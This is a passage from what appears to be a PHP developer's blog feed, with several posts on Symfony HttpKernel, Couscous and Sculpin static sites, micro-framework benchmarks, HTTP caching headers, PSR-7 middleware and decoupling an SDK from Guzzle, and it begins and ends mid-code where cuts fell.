'error' => 'An error occured, if it keeps happening please contact an administrator and provide the following token: '.$token,
)),
500,
array('Content-Type' => 'application/json'))
);
}
}
Note: Ramsey UUID is used here to provide a unique token that can be referred to.
EventDispatcher is another example of a simple yet powerful Symfony component. HttpKernel uses it to configure a standard "Symfony application", but also to allow us to change its behaviour.
In this article we've seen the basics and how it works behind the hood when used by HttpKernel, but we could create our own event and dispatch it to make our own code "Open for extension, but Close to modification" (Open/Close principle).
]]>Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: $response = $httpKernel->handle($request);
Symfony provides many standalone libraries (also known as "Components") that help us build applications.
In this guide we'll see the main ones that allow us to build an application:
We'll also see how HttpKernel enables reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
Symfony provides a HttpKernel component
which follows the HTTP protocol: it converts a Request into a Response.
It all revolves around the following interface:
<?php
namespace Symfony\Component\HttpKernel;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
interface HttpKernelInterface
{
const MASTER_REQUEST = 1;
const SUB_REQUEST = 2;
/**
* @param Request $request
* @param int $type
* @param bool $catch Whether to catch exceptions or not
*
* @return Response
*/
public function handle(Request $request, $type = self::MASTER_REQUEST, $catch = true);
}
HttpKernel relies on the HttpFoundation component which mainly provides:
Request: wraps $_GET, $_POST, $_COOKIE, $_FILES and $_SERVERResponse: wraps header() and setcookie(), but also displays the contentNote: Global variables have the drawback to be possibly accessed by many functions, causing their state to be unpredictable (hence bugs happen and they are hard to find/understand).
With HttpFoundation, PHP super globals shouldn't be accessed directly, but rather via the objects that wraps them (e.g.
Request) which are passed around (those objects are not global).
Here's a typical usage:
$request = Request::createFromGlobals();
$response = $httpKernel->handle($request);
$reponse->send();
In the above example, Request will be initialized using PHP super globals.
Sometimes it can be useful to build it with our own provided values (e.g. for tests):
$uri = '/v1/items';
$method = 'POST';
$parameters = array(); // GET or POST parameters, usually left unused (use uri and content instead)
$cookies = array();
$files = array();
$headers = array('CONTENT_TYPE' => 'application/json');
$content = json_encode(array('name' => 'Arthur Dent'));
$request = Request::create($uri, $method, $getOrPostParameters, $cookies, $files, $headers, $content);
In our application, we'll mainly extract its parameters:
$getParameter = $request->query->get('description'); // e.g. from URI `/?description=hitchhicker`
$postParameter = $request->request->get('name'); // e.g. from content `name=Arthur`
$header = $request->headers->get('Content-Type'); // e.g. from headers `Content-Type: application/x-www-form-urlencoded`
$customParameter = $request->attributes->get('_route'); // We'll see more about it in the next article
Note: Those public properties are instances of
Symfony\Component\HttpFoundation\ParameterBag, exceptheaderswhich is an instance ofSymfony\Component\HttpFoundation\HeaderBag.
In our application we'll mainly build Response:
$content = json_encode(array('name' => 'Arthur Dent'));
$status = 201;
$headers = array('Content-Type' => 'application/json');
$response = new Reponse($content, $status, $headers);
HttpFoundation also wraps $_SESSION in a convenient Session object. This one
is however out of the scope of this series, to find more about it have a look at
Symfony Session Introduction.
Let's create a small Hello World example:
<?php
use Symfony\Component\HttpKernel\HttpKernelInterface;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class HelloWorldHttpKernel implements HttpKernelInterface
{
public function handle(Request $request, $type = self::MASTER_REQUEST, $catch = true)
{
$name = $request->query->get('name', 'World');
return new Response("Hello $name!", 200);
}
}
$httpKernel = new HelloWorldHttpKernel();
$request = Request::createFromGlobals();
$response = $httpKernel->handle($request);
$response->send();
So we can get the following:
/ URL, we get Hello World!/?name=Arthur URL, we get Hello Arthur!Symfony provides a simple yet powerful component allowing us to follow the HTTP protocol.
In this article we've seen the basics and how it works behind the hood, but in
an actual application we don't necessarily need to create our own implementation
of HttpKernelInterface.
Indeed there's a Symfony\Component\HttpKernel\Kernel abstract class that can
be used out of the box. It provides many features that we'll explore in the next
articles:
TL;DR: Links I tweeted during 2015
It's funny how old principles are still useful today. In 2015, the most important ones I've learned are the following:
It was a year full of links, so here they are!
The first step is to get the tool:
curl -OS http://couscous.io/couscous.phar
sudo mv ./couscous.phar /usr/loal/bin/couscous
Then we need to create a couscous.yml file at the root of our Github Project:
template:
url: https://github.com/CouscousPHP/Template-Light.git
baseUrl: http://<user-name>.github.io/<project-name>
title: <project-title>
subTitle: <project-short-decription>
github:
user: <user-name>
repo: <project-name>
menu:
items:
home:
text: Home
relativeUrl:
<article-name>:
text: <article-title>
relativeUrl: <article-filename>.html
Of course <user-name>, <project-name>, <project-title>, <project-short-decription>,
<article-name>, article-title and article-filename need to be replaced accordingly.
Couscous is going to automatically use *.md files found in the project (e.g. README.md).
The menu section in couscous.yml will generate a handy menu. Usually home
as well as the rest of the documentation is listed here, for example:
menu:
items:
home:
text: Home
relativeUrl:
installation:
text: Installation
relativeUrl: doc/01-installation.html
compatibility:
text: Compatibility
relativeUrl: doc/02-compatibility.html
benchmark:
text: Benchmark
relativeUrl: doc/03-benchmark.html
To generate the documentation, simply run:
couscous preview
This will launch a local server, allowing us to preview the documentation at http://localhost:8000.
Once satisfied, we can run:
couscous deploy
This will generate the definitive HTML, commit them in a gh-page branch and push
it, making it available online.
Couscous provides the possibility to host nice documentation for Github projects, thanks to its simplicity.
]]>Both tools are really similar:
However Sculpin has a better support and its author is a member PHP FIG. Let's see how it works
Github provides a service allowing people to host static webistes: Pages. The idea is simple:
<username>.github.ioWe can create a _sculpin directory at the root of the project, install inside
it our Sculpin application with the page sources and finally generate the HTML
files back in the root directory.
Installing Scuplin is very easy as a PHAR is provided:
curl -O https://download.sculpin.io/sculpin.phar
php sculpin.phar install
php sculpin.phar generate --watch --server
The generate command will convert all markdown files into HTML and the --server
option will launch a local web server alowing us to preview the website in the browser.
Articles are written in the source/_posts directory and their name must be
preffixed with their publication date (e.g. 2016-01-25-my-article.md).
Every page starts with a front matters:
---
layout: post
title: My Article
tags:
- essay
---
The rest of the file is in standard markdown and will constitute the content of the page.
Once happy with the changes, we can generate the final HTML:
php sculpin.phar generate --env=prod
The files will be located in output_prod. If we want to use Github Pages as
described above, we simply need to move those files to the root directory:
cp -r output_prod/* ../
Then we simply need to commit all the changes and push.
Sculpin is quite simple to use: write some markdown files and let it generate HTML files out of it. It uses Symfony and Twig behind the scene making it really easy to extend.
]]>Note: Migrating from carew has been a simple task. In my case it required:
- removing all
linkfunction usage and use instead markdown links- configure
permalinkto:year/:month/:day/:filename.htmlinapp/config/sculpin_kernel.ymlto keep URL backward compatibility
TD;DR: Symfony has always been able to be used as a micro framework. For more "add what you need" micro-framework like spirit, use the Empty Edition and the MicroFrameworkBundle.
There are many definitions out there to qualify a framework as being "micro", among them the following criterias often appear:
Is Symfony a micro framework as well? Let's find out.
Note: To know more about how to determine if a framework is micro, read Igor Wiedler article: How heavy is Silex?.
While "Hello World" examples rarely reflect real world applications, it's going to be good enough to serve the purpose of this article: getting a good measure of Symfony's API, LOC, dependencies and footprint.
Since dependencies and footprint are easy to measure, we're going to rely on it. However, all benchmarks are relative to the computer that executes them, so we need a point of reference: a flat PHP "Hello World" application:
<?php
// index.php
echo 'Hello World';
Let's run the benchmark:
php -S localhost:2501 &
ab -c 10 -t 10 'http://localhost:2501/index.php'
killall php
Result: 6 915.03 Requests per second.
To get the Standard Edition, we can use composer:
composer create-project symfony/framework-standard-edition
cd framework-standard-edition
Since the standard edition follows a "solve 80% of use cases out of the box" philosohpy, it's almost ready, we just need to tweak the given controller:
<?php
// src/AppBundle/Controller/DefaultController.php
namespace AppBundle\Controller;
use Sensio\Bundle\FrameworkExtraBundle\Configuration\Route;
use Symfony\Bundle\FrameworkBundle\Controller\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class DefaultController extends Controller
{
/**
* @Route("/", name="homepage")
*/
public function indexAction(Request $request)
{
return new Response('Hello World');
}
}
Let's run the benchmark:
SYMFONY_ENV=prod composer update -o --no-dev
php -S localhost:2502 -t web &
ab -c 10 -t 10 'http://localhost:2502/app.php'
killall php
Result: 134.23 Requests per second.
We're also going to list the dependencies:
tree -d -L 2 vendor/ | grep ' ' | wc -l
tree -d -L 2 vendor/ | grep ' ' | wc -l
We get 28 + 1, to which we need to substitute symfony with all the
packages it replaces (44): 72.
So to sum up:
As stated above the Standard Edition has a "solve 80% of use cases out of the box" philosophy, so it comes with many dependencies that might not fit our use. Micro framework usually follow a "add what you need philosophy", which is exactly what the Empty Edition is all about.
Let's see if we can get more micro with it:
composer create-project gnugat/symfony-empty-edition
cd symfony-empty-edition
The first step is to create a controller:
<?php
// src/AppBundle/Controller/HelloController.php
namespace AppBundle\Controller;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class HelloController
{
public function world(Request $request)
{
return new Response('Hello World');
}
}
Then we register it as a service:
# app/config/services/controller.yml
services:
app.hello_controller:
class: AppBundle\Controller\HelloController
Finally we register the route:
# app/config/routings/app.yml
hello_world:
path: /
defaults:
_controller: app.hello_controller:world
methods:
- GET
Let's run the benchmark:
composer update -o --no-dev
php -S localhost:2503 -t web &
ab -c 10 -t 10 'http://localhost:2503/app.php'
killall php
Result: 524.53 Requests per second.
We're also going to list the dependencies:
tree -d -L 2 vendor/ | grep ' ' | wc -l
tree -d -L 2 vendor/ | grep ' ' | wc -l
We get 6 + 23 = 29.
So to sum up:
By reducing the number of dependencies, we also drastically reduced the framework footprint. This is not surprising as:
Can we go further? Certainly: the FrameworkBundle also follows a "solve 80% of use cases out of the box" (includes Forms, Security, Templating, Translation, Assets, annotations, etc).
By using a MicroFrameworkBundle that would provide the strict minimum and follow
the micro framework philosophy of "add what you need" we can surely reduce further
the number of dependencies. Hence gnugat/micro-framework-bundle:
composer require 'gnugat/micro-framework-bundle'
composer remove 'symfony/framework-bundle'
Then we need to swap the bundle in the registration:
<?php
// app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
use Symfony\Component\Config\Loader\LoaderInterface;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Gnugat\MicroFrameworkBundle\GnugatMicroFrameworkBundle(),
new AppBundle\AppBundle(),
);
}
public function getRootDir()
{
return __DIR__;
}
public function getCacheDir()
{
return dirname(__DIR__).'/var/cache/'.$this->environment;
}
public function getLogDir()
{
return dirname(__DIR__).'/var/logs';
}
public function registerContainerConfiguration(LoaderInterface $loader)
{
$loader->load($this->rootDir.'/config/config_'.$this->environment.'.yml');
}
}
Finally we can get rid of some configuration:
# app/config/config.yml
imports:
- { resource: parameters.yml }
- { resource: services/ }
Let's benchmark our trimmed application:
rm -rf var/*
composer update -o --no-dev
php -S localhost:2504 -t web &
ab -c 10 -t 10 'http://localhost:2504/app.php'
killall php
Result: 872.83 Requests per second.
We're also going to list the dependencies:
tree -d -L 2 vendor/ | grep ' ' | wc -l
tree -d -L 2 vendor/ | grep ' ' | wc -l
We get 3 + 13 = 16.
So to sum up:
Symfony has always been able to be used as a micro framework bundle.
The Standard Edition and the FrameworkBundle follow a "solve 80% of use cases out of the box" philosohpy, which is better for new comers.
However for experimented developers who're looking for a "add what you need" philosophy, which is what micro-framework usually follow, using the Empty Edition and MicroFrameworkBundle can be a viable alternative (they are slimer in term of dependencies and faster).
]]>Note: At the time of writing, MicroFrameworkBundle is still under development (version
0.1.0). Use it at your own risk and contribute to it :) .
TL;DR: Enable HTTP cache by setting one of the following header in your Responses:
Cache-Control, Expires, Last-Modified or Etag.
The HTTP protocol specifies how to cache Responses:
The following actors are involved:
AppCache embed in SymfonyIts advantages:
Its drawbacks:
A Response can be cached if the incoming Request complies to the following rules:
GET or HEAD methodVary are the sameAuthorization headerFor example, the following Request can produce cacheable Responses:
GET /v1/items?page=1
Accept: application/json
Vary: Accept
Sending the following Request would produce a different cacheable Response:
GET /v1/items?page=1
Accept: text/html
Vary: Accept
To be cacheable, a Response should also have one of the headers described in the next section.
Note: Headers specified in
Varywill have their value stored in the Reverse Proxy. Sensitive data (e.g. API keys, password, etc) shouldn't be used as a cache key.
HTTP cache provides the possibility to choose different strategies:
If a Response can be safely cached for a fixed period of time (e.g. 10 minutes),
use Cache-Control HTTP Header:
HTTP/1.1 200 OK
Cache-Control: max-age=600
Content-Type: application/json
{"id":42,"name":"Arthur Dent"}
Note: the Reverse Proxy will add a header to the Response indicating its age:
HTTP/1.1 200 OK Age: 23 Cache-Control: max-age=600 Content-Type: application/json {"id":42,"name":"Arthur Dent"}
If a Response can be safely cached until a known date (e.g. the 30th of October 1998,
at 2:19pm), use Expires HTTP Header:
HTTP/1.1 200 OK
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Content-Type: application/json
{"id":42,"name":"Arthur Dent"}
Note: the HTTP date format is required.
The Reverse Proxy can serve stale cached copy and then asynchronously check with
the Application if it needs to be refreshed, using Last-Modified (a date) or/and
ETag (a hash) HTTP Headers:
HTTP/1.1 200 OK
Last-Modified: Tue, 8 Sep 2015 13:35:23 GMT
ETag: a3e455afd
Content-Type: application/json
{"id":42,"name":"Arthur Dent"}
Note: the Reverse Proxy will add a header to requests with
If-Modified-Since(a date) or/andIf-None-Match(a hash):GET /v1/users/42 HTTP/1.1 If-Modified-Since: Tue, 8 Sep 2015 13:35:23 GMT If-None-Match: a3e455afd Accept: application/jsonIf the Response shouldn't be updated, the Server should return a
304 Not ModifiedResponse.
Keep in mind that Cache-Control header can be used by both the Reverse Proxy
and the Client (e.g. a browser) to cache the Response.
max-age=[seconds]: How long the Response should be cacheds-maxage=[seconds]: Same as max-age but for Reverse Proxy onlyprivate: Only the Client can cache (default for authenticated Responses)public: Proxy can also cache (for authenticated Responses)no-cache: Refresh the cached copy (but still caches it)no-store: Response should not be cached anywhere (e.g. because it contains sensitive data)must-revalidate: Refresh the cached copy if it is staleproxy-revalidate: Same as must-revalidate but for Reverse Proxy onlyThe date MUST be represented in Greenwich Mean Time (GMT), with the following format: D, d M Y H:i:s GMT
D: A textual representation of a day, three letters (Mon to Sun)d: Day of the month, 2 digits with leading zeros (01 to 31)M: A short textual representation of a month, three letters (Jan to Dec)Y: A full numeric representation of a year, 4 digits (e.g. 1999, 2003)H: 24-hour format of an hour with leading zeros (00 to 23)i: Minutes with leading zeros (00 to 59)s: Seconds, with leading zeros (00 to 59)The Expires header is usually used to cache responses for application which are
updated on a regular date (synchronization with a source of the data).
The Last-Modified header is used when the data has an updated_at field we can
rely on.
The Etag header is used when we can safely create a hash of the response and compare
it with with the cached copy.
Note: With
Last-ModifiedandEtag, the Reverse Proxy serves first the cached Reponse and then check asynchronously with the application if it is stale.
Finally the Cache-Control header is usually used in any other situation.
More readings about HTTP Cache can be found here:
]]>The main package, psr/http-message, has a few implementations but mainly it comes down to:
The standard interfaces leave little room for implementation details by forcing immutability and streams. It mainly leaves freedom in the way implementations are constructed though.
Note: Beyond that, Diactoros and Guzzle still differ slightly.
It's a pity we didn't end up directly with standard value objects, but we'll have to do with those interfaces for now. So now, what's the next step for PSR-7?
Middlewares have been around for a while now (in PHP as well as in other languages). The idea is to have:
Let's take Symfony's HttpKernelInterface as an example:
<?php
namespace Symfony\Component\HttpKernel\HttpKernelInterface;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
interface HttpKernelInterface
{
const MASTER_REQUEST = 1;
const SUB_REQUEST = 2;
// @return Response
public function handle(Request $request, $type = self::MASTER_REQUEST, $catch = false);
}
Symfony provides a HttpKernel implementation to take care of creating a
Response for the given Request. Middlewares would wrap the call to
HttpKernel#handle with their own logic, which could be:
Accept headerHere's an example to always rollback database transactions with Pomm Foundation.
<?php
namespace Acme\Fortune\Bridge\HttpKernel;
use PommProject\Foundation\QueryManager\QueryManagerInterface;
use Symfony\Component\HttpKernel\HttpKernelInterface;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\Response;
class RollbackKernel implements HttpKernelInterface
{
private $httpKernel;
private $queryManager;
public function __construct(HttpKernelInterface $httpKernel, QueryManagerInterface $queryManager)
{
$this->httpKernel = $httpKernel;
$this->queryManager = $queryManager;
}
// @return Response
public function handle(Request $request, $type = self::MASTER_REQUEST, $catch = false)
{
$this->queryManager->query('START TRANSACTION');
$response = $this->httpKernel->handle($request, $type, $catch);
$this->queryManager->query('ROLLBACK');
return $response;
}
}
The Stack initiative provides visibility on those HttpKernelInterface middlewares.
Note: Stack is inspired by Ruby's rack.
So the next step would be to provide a standard interface to allow PSR-7 middlewares. Of course such a standard isn't straigthforward as there are many ways to create middlewares.
Similar to HttpKernelInterface, this one just receives a RequestInterface
and returns a ResponseInterface:
<?php
use Psr\Message\RequestInterface;
use Psr\Message\ResponseInterface;
interface RequestHandler
{
// @return ResponseInterface
public function handleRequest(RequestInterface $request);
}
Names can be debated, but the point here is that calling the next middleware is up to the implementation (can use dependency injection).
Httplug is a good example using this implementation.
Another interface commonly encountered forces the way of managing the next middleware:
<?php
use Psr\Message\RequestInterface;
use Psr\Message\ResponseInterface;
interface RequestHanler
{
public function handleRequest(
RequestInterface $request,
ResponseInterface $response,
RequestHanler next = null
);
}
This one requires the response to be passed as an argument, as well as the next middleware.
A good example using this implementation would be Zend Stratigility
Middlewares are really powerful and PSR-7 would benefit greatly from it, but we're missing a standard for it. As long as it will be missing, we're going to assist to the creation of a wide range of "PSR-7 middlewares", all incompatible with each others.
Since this seems inevitable, maybe we should instead try to figure out a new standard that would allow to compose all those middlewares?
]]>QueryBuilder:
// Usually in a controller
$queryBuilder = $this->itemRepository->queryBuilderForFindAll();
$results = $paginationService->paginate(
$queryBuilder,
$currentPageNumber,
$itemsPerPage
);
This is necessary because we need to get the result for the page as well as the number of total results (with a database it would mean two queries). Unfortunately this kind of logic tends to leak in our controllers which is why Benjamin Eberlei suggests an elegant alternative:
// Can be done in a service
$result = $this->itemRepository->findAll();
// Can be done in a ViewListener
$page = $result->take($currentPageNumber, $itemsPerPage);
The QueryBuilder is actually wrapped in a Result which provides the possibility
to get all of them or a single portion.
Its take method returns the PaginatorService wrapped in a Page which contains
all the meta data we usually expect (page number, total elements, etc).
To make it possible he created porpaginas,
a small library that provides Result and Page as interfaces.
The actual pagination logic is delegated to the library of our choice, using adapters.
Enjoy!
]]>Decoupling can be considered as a "Best Practice" as it is a good protection against external changes, but it doesn't mean that it should always be applied everywhere.
This article is about mitigating the usage of this tool.
Decoupling is an important part of clean code, as it can allow a better readability.
For example instead of having a controller full of logic, we just have a Command class initialized with the input parameters that matter and a class name that describe the expected behavior. Inside the Command Handler, instead of having implementation details we have a sequence of service calls that decribe even further the behavior.
Clean code is all about making the application easier to maintain so in theory this should be applied everywhere, but like every rules it can be abused and its usefulness depends on the type of the project.
It might seem strange but some projects don't need to be maintained, for example Proof of Concepts are usually thrown away once the experience they were designed for are done, so it doesn't make sense to take the time to make them perfect.
Some industry are also commissioned to bootstrap a project as fast as possible and are expected to pass over the project without any maintainance plan: usually the ones that promise the earlier delivery for the lowest price are selected. Again it doesn't make sense to take the time to create the most beautiful code if that's not what's been asked and paid for.
Trying to use the right tool for the right job is an important part of being pragmatic.
We've seen that some projects don't necessarly need decoupling as we don't expect to maintain them. But sometimes a project might need decoupling in some parts of it and not in other parts.
As the saying goes, "Fool me once, shame on you, fool me twice, shame on me": since we can't know in advance which parts are going to change we might decide to couple things first. When an issue occurs due to the coupling, we can refactor to avoid further issues.
Last but not least, we can't always decouple from everything: for example the programming language used can also release backward incompatible changes, or we might want to switch to an entirely different one. Is it worth decouling from the language?
Decoupling is a great tool that should be used when needed but the decision of when to use it depends on the context (project, team, industry, etc).
The rule of thumb number one is: don't follow blindly rule of thumbs.
]]>They also share the same Backward Compatibility (BC) break issue, since they will change to solve their own concerns, regardless of our projects.
Here's a true story with Guzzle: we started to use version 2 in our project and spread direct calls to it in different places. After a while we've decided to use Flysystem and its SDK for Amazon S3 but we had a problem: it required Guzzle 3. This means tracking down every usage of Guzzle in the project and adapting the calls to the new version. It's a dawnting task, especially when the project doesn't have strong enough tests.
Later on, when Amazon S3 SDK stabilized, it started to require Guzzle 5...
Does that mean that we shouldn't use any libraries? Should we just don't care and continue to use them in the same way?
This article will explain how to avoid both extremes, by decoupling from the library. It can be done by using the Inversion of Control principle: instead of relying on the library we rely on interfaces and provide an implementation that uses the library.
In the previous article, we started to create an endpoint allowing us to subit new quotes for a fortune application.
We're now going to create a SDK for it:
mkdir fortune-sdk
cd fortune-sdk
To do so, we'll create the composer.json file:
{
"name": "acme/fortune-sdk",
"description": "A PHP SDK for Fortune",
"type": "library",
"license": "MIT",
"autoload": {
"psr-4": {
"Acme\\FortuneSdk\\": "src/Acme/FortuneSdk"
}
},
"autoload-dev": {
"psr-4": {
"Acme\\FortuneSdk\\Fixtures\\": "fixtures",
"Acme\\FortuneSdk\\Tests\\": "tests"
}
},
"require": {
"php": ">=5.4",
},
"require-dev": {
"phpspec/phpspec": "^2.3",
"phpunit/phpunit": "^4.5",
"symfony/console": "^2.3",
"symfony/yaml": "^2.2"
}
}
Then create a test script:
#!/usr/bin/env sh
# bin/test.sh
composer --quiet --no-interaction update --optimize-autoloader > /dev/null
vendor/bin/phpspec --no-interaction run -f dot && vendor/bin/phpunit
And finally configure PHPUnit:
<?xml version="1.0" encoding="UTF-8"?>
<!-- phpunit.xml.dist -->
<!-- http://phpunit.de/manual/4.1/en/appendixes.configuration.html -->
<phpunit xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://schema.phpunit.de/4.1/phpunit.xsd"
backupGlobals="false"
colors="true"
bootstrap="vendor/autoload.php"
>
<testsuites>
<testsuite name="Fortune SDK Test Suite">
<directory>tests</directory>
</testsuite>
</testsuites>
</phpunit>
Since Guzzle might completly change next year, we're going to abstract it behind our own HTTP client:
<?php
// src/Acme/FortuneSdk/Remote/RequestHandler.php
namespace Acme\FortuneSdk\Remote;
use Psr\Http\Message\RequestInterface;
use Psr\Http\Message\ResponseInterface;
interface RequestHandler
{
/**
* @param RequestInterface $request
*
* @return ResponseInterface
*
* @throws ClientException If client throws an unexpected exception (e.g. connection error, etc)
*/
public function handle(RequestInterface $request);
}
We've decided to use the new PSR-7 standard:
composer require psr/http-message:^1.0
We'll hide any errors behind our own exception:
<?php
// src/Acme/FortuneSdk/Remote/ClientException.php
namespace Acme\FortuneSdk\Remote;
use RuntimeException;
class ClientException extends RuntimeException
{
}
Its first implementation will be with Guzzle 6:
<?php
// src/Acme/FortuneSdk/Remote/RequestHandler/GuzzleSixRequestHandler.php
namespace Acme\FortuneSdk\Remote\RequestHandler;
use Acme\FortuneSdk\Remote\ClientException;
use Acme\FortuneSdk\Remote\RequestHandler;
use Exception;
use GuzzleHttp\Client;
use GuzzleHttp\Exception\BadResponseException;
use Psr\Http\Message\RequestInterface;
class GuzzleSixRequestHandler implements RequestHandler
{
private $client;
public function __construct(Client $client)
{
$this->client = $client;
}
public function handle(RequestInterface $request)
{
try {
return $this->client->send($request);
} catch (BadResponseException $e) {
return $e->getResponse();
} catch (Exception $e) {
throw new ClientException('Client threw an unexpected exception', 0, $e);
}
}
}
And that's it. When Guzzle 7 will be released, we'll just have to create a new implementation and throw away the old one instead of having to replace it everywhere in our project. We can even change our mind and use a completly different HTTP client (Buzz, etc).
Since we've started to softly depend on Guzzle, we need to install it with Composer:
composer require guzzlehttp/guzzle:^6.0
We can now create a functional test describing our service:
<?php
// tests/Quote/SubmitNewQuoteTest.php
namespace Acme\FortuneSdk\Tests\Quote;
use Acme\FortuneSdk\Quote\SubmitNewQuote\RemoteSubmitNewQuote;
use Acme\FortuneSdk\Fixtures\FixturesRequestHandler;
use PHPUnit_Framework_TestCase;
class SubmitNewQuoteTest extends PHPUnit_Framework_TestCase
{
const URL = 'http://example.com';
const QUOTE = 'Nobody expects the Spanish Inquisition!';
private $submitNewQuote;
protected function setUp()
{
$requestHandler = new FixturesRequestHandler();
$this->submitNewQuote = new RemoteSubmitNewQuote($requestHandler, self::URL);
}
/**
* @test
*/
public function it_can_submit_a_new_quote()
{
$quote = $this->submitNewQuote->submit(self::QUOTE);
self::assertSame(self::QUOTE, $quote['quote']);
}
}
Let's run the tests:
sh ./bin/test.sh
It fails because FixturesRequestHandler doesn't exist. It's an implementation
of RequestHandler designed for our tests: even if the endpoint actually existed,
relying on network calls in our tests would only make them brittle
(because it's slow and unreliable).
Let's create it:
<?php
// fixtures/FixturesRequestHandler.php
namespace Acme\FortuneSdk\Fixtures;
use Acme\FortuneSdk\Remote\RequestHandler;
use Psr\Http\Message\RequestInterface;
use Zend\Diactoros\Response;
use Zend\Diactoros\Stream;
class FixturesRequestHandler implements RequestHandler
{
private $routes;
public function __construct()
{
$this->routes = array(
array(
'controller' => new Controller\Quote\SubmitNewQuoteController(),
'pattern' => '#/quotes#',
'methods' => array('POST'),
),
);
}
public function handle(RequestInterface $request)
{
$path = $request->getUri()->getPath();
$method = $request->getMethod();
foreach ($this->routes as $route) {
if (1 === preg_match($route['pattern'], $path)) {
if (false === in_array($method, $route['methods'], true)) {
$body = new Stream('php://temp', 'w');
$body->write(json_encode(array(
'message' => "Method \"$method\" for route \"$path\" not supported (supported methods are: ".implode(', ', $route['methods']).")",
)));
return new Response($body, 405, array('Content-Type' => 'application/json'));
}
try {
return $route['controller']->handle($request);
} catch (FixturesException $e) {
$body = new Stream('php://temp', 'w');
$body->write($e->getMessage());
return new Response($body, $e->getCode(), array('Content-Type' => 'application/json'));
}
}
}
$body = new Stream('php://temp', 'w');
$body->write(json_encode(array(
'message' => "Route \"$path\" not found",
)));
return new Response($body, 404, array('Content-Type' => 'application/json'));
}
}
We've decided to rely on Zend Diactoros to build the request, since it is the de facto implementation of PSR-7:
composer require zendframework/zend-diactoros:^1.0
We've open the possibility of managing many endpoints with this class. We now need to define a controller for the quote submission one:
<?php
// fixtures/Controller/Quote/SubmitNewQuoteController.php
namespace Acme\FortuneSdk\Fixtures\Controller\Quote;
use Acme\FortuneSdk\Remote\RequestHandler;
use Acme\FortuneSdk\Fixtures\FixturesException;
use Psr\Http\Message\RequestInterface;
use Zend\Diactoros\Response;
use Zend\Diactoros\Stream;
class SubmitNewQuoteController implements RequestHandler
{
public function handle(RequestInterface $request)
{
$submitNewQuote = json_decode($request->getBody()->__toString(), true);
if (false === isset($submitNewQuote['quote'])) {
throw FixturesException::make('Missing required "quote" parameter', 422);
}
$quote = (string) $submitNewQuote['quote'];
if ('' === $quote) {
throw FixturesException::make('Invalid "quote" parameter: must not be empty', 422);
}
$body = new Stream('php://temp', 'w');
$body->write(json_encode(array(
'id' => '',
'quote' => $quote
)));
return new Response($body, 201, array('Content-Type' => 'application/json'));
}
}
Finally we need to write the exception class:
<?php
// fixtures/FixturesException.php
namespace fixtures\Acme\FortuneSdk\Fixtures;
use DomainException;
class FixturesException extends DomainException
{
/**
* @param string $message
* @param int $statusCode
*
* @return FixturesException
*/
public static function make($message, $statusCode)
{
return new self(json_encode(array('message' => $message)), $statusCode);
}
}
Let's run the tests:
sh ./bin/test.sh
They now fail because SubmitNewQuote doesn't exist.
First of all, we'll define our service as an interface:
<?php
// src/Acme/FortuneSdk/Quote/SubmitNewQuote.php
namespace Acme\FortuneSdk\Quote;
interface SubmitNewQuote
{
public function submit($quote);
}
This will allow developers using our SDK to create their own implementation for testing or extension purpose. It will also allow us to create Composite implementation: we can have a remote implementation that does the actual work, wrapped in a lazy cache implementation itself wrapped in a log implementation.
Here we'll just take care of the remote one, let's bootstrap its test:
vendor/bin/phpspec describe 'Acme\FortuneSdk\Quote\SubmitNewQuote\RemoteSubmitNewQuote'
And now we can write the tests:
<?php
// spec/Acme/FortuneSdk/Quote/SubmitNewQuote.php
namespace spec\Acme\FortuneSdk\Quote\SubmitNewQuote;
use Acme\FortuneSdk\Remote\RequestHandler;
use PhpSpec\ObjectBehavior;
use Prophecy\Argument;
use Psr\Http\Message\ResponseInterface;
use Psr\Http\Message\StreamInterface;
class RemoteSubmitNewQuoteSpec extends ObjectBehavior
{
const URL = 'http://example.com';
const QUOTE = 'Nobody expects the Spanish Inquisition!';
function let(RequestHandler $requestHandler)
{
$this->beConstructedWith($requestHandler, self::URL);
}
function it_is_a_submit_new_quote()
{
$this->shouldImplement('Acme\FortuneSdk\Quote\SubmitNewQuote');
}
function it_calls_the_remote_endpoint(
RequestHandler $requestHandler,
ResponseInterface $response,
StreamInterface $stream
) {
$quote = array(
'quote' => self::QUOTE,
);
$request = Argument::type('Psr\Http\Message\RequestInterface');
$requestHandler->handle($request)->willReturn($response);
$response->getBody()->willReturn($stream);
$stream->__toString()->willReturn(json_encode($quote));
$this->submit(self::QUOTE)->shouldBe($quote);
}
}
In this test, we've used a wildcard to represent the request since the service is going to create it. This is at the cost of not knowing how it is built.
If we absolutely want to have control over this, we need to delegate the request construction to a factory, it then becomes possible to mock the request and check how it is built:
<?php
// spec/Acme/FortuneSdk/Quote/SubmitNewQuote.php
namespace spec\Acme\FortuneSdk\Quote\SubmitNewQuote;
use Acme\FortuneSdk\Remote\RequestFactory;
use Acme\FortuneSdk\Remote\RequestHandler;
use PhpSpec\ObjectBehavior;
use Psr\Http\Message\RequestInterface;
use Psr\Http\Message\ResponseInterface;
use Psr\Http\Message\StreamInterface;
class RemoteSubmitNewQuoteSpec extends ObjectBehavior
{
const URL = 'http://example.com';
const QUOTE = 'Nobody expects the Spanish Inquisition!';
function let(RequestFactory $requestFactory, RequestHandler $requestHandler)
{
$this->beConstructedWith($requestFactory, $requestHandler, self::URL);
}
function it_is_a_submit_new_quote()
{
$this->shouldImplement('Acme\FortuneSdk\Quote\SubmitNewQuote');
}
function it_calls_the_remote_endpoint(
RequestFactory $requestFactory,
RequestHandler $requestHandler,
RequestInterface $request,
ResponseInterface $response,
StreamInterface $stream
) {
$quote = array(
'quote' => self::QUOTE,
);
$requestFactory->make(self::URL.'/v1/quotes', 'POST', json_encode($quote), array(
